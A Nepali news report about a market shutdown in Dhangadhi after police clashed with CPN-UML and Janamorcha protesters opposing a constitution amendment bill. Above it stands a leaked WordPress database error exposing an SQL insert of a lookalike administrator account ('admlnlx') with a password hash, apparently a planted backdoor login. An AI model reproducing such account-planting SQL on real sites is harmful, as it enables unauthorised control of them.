WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3Pzpgp38dsYI3cvfQ03JImwP53gPx/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:29:23', '', 'admlnlx', 'admlnlx')
धनगढी, मंंसिर २३ –
नेकपा ९एमाले० र जनमोर्चाका कार्यकर्ताले बुधबार यहाँ गरेको शान्तिपूर्ण प्रदर्शनका क्रममा प्रहरीले दमन गरेको विरोधमा आज बजार बन्द गरेका छन् ।
बन्दका कारण यस क्षेत्रमा व्यापार व्यवसाय शैक्षिक संस्था ठप्प हुँदा जनजीवन पनि प्रभावित भएको छ । बन्दका कारण आज धनगढीबाट लामो तथा छोटो दूरीमा चल्ने कुनै पनि सवारी साधनसमेत सञ्चालन हुन सकेका छैनन् ।
संविधान संशोधन विधेयकको विरोधमा रहेका नेकपा ९एमाले० र राष्ट्रिय जनमोर्चाका कार्यकर्ताले बुधबार प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’को यहाँको कार्यक्रमलाई लक्षित गरी गरिएको प्रदर्शनका क्रममा झडपसमेत भएको थियो । झडपमा आफूसहित आठजना प्रदर्शनकारी घाइते भएको एमालेका जिल्ला अध्यक्ष दीर्घ सोडारीले बताउनुभयो । – रासस